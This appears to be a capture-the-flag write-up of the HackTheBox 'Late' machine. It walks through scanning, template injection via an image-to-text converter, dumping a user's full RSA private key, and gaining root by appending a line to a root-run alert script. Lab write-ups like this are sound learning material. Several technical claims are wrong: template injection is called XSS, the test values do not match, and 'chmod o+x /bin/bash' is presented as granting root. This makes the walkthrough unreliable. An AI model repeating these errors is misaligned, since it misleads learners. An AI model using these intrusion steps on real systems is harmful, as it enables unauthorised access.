This is a writeup for the Late machine from the HackTheBox site.
First, let's start with a scan of our target with the following command:
nmap -sV -T4 -Pn 10.129.45.153
Two TCP ports are discovered:
- 22/tcp : SSH port (OpenSSH 7.6p1)
- 80/tcp : HTTP web server (nginx 1.14.0)
First of all, let's start with the enumeration of the site's files.
After some research in the results nothing very interesting in this site. So I scan the subdomains.
I find the
images subdomain. I add it in the
/etc/hosts file, then I go to the site.
It is a site that allows to recover text present in an image and to send it back in a file. For that there is a treatment, in particular of the recognition of character. But is there any additional processing?
After some unsuccessful tests I try to perform an XSS (Cross Site Scripting). To try to determine if there is indeed a possibility to do it. I send the following image to the server:
Depending on the answer I will be able to determine if this attack is feasible and also potentially this Framework is used:
- 777777 -> Jinja2
- 49 -> Twig
┌──(d3vyce㉿kali)-[~/Downloads] └─$ cat results.txt <p>7777777 </p>
After retrieving the result file we find the answer
7777777. The XSS is therefore possible and the framework has a great chance to be Jinja2! I go to the following github to see the possibilities.
I first try to send the following image:
┌──(d3vyce㉿kali)-[~/Downloads] └─$ cat results.txt <p>uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc) </p>
In the result file I find the expected result, the web application is executed as
svc_acc. I now try to see if this user has an RSA key that would allow me to connect via SSH:
-----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi /mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7 d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7 7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0 ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7 t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq 0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y 3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+ Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0 kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw== -----END RSA PRIVATE KEY-----
Now that I have the RSA key in my possession, I can connect in SSH and get the first flag :
To start I run the linpeas.sh script to get an idea of what is present on the machine. Quickly I find a script
ssh-alert.sh which is a script belonging to my user, but which is executed by root.
I look at its contents and find that it is a script that generates an alert by mail for each session opened via SSH.
Knowing that I can modify it, I add the following line at the end of the file.
echo "chmod o+x /bin/bash" >> ssh-alert.sh
This allows to add to the file a
euid = 0, which will allow me to execute the script as root. This is the same principle that is used with the su command. I quit the ssh session, I restart it, then I create a bash session with the following command :
I am now root of the machine and I can recover the last flag.
bash-4.4# cat /root/root.txt 0abb3c1b4d046ab54e80851cf85c6448
To patch this host I think it would be necessary to perform a number of actions:
- Update the image converter to avoid XSS
- Launch web applications with a user with minimum rights and no RSA key
- Do not let a user-modifiable script be executed by root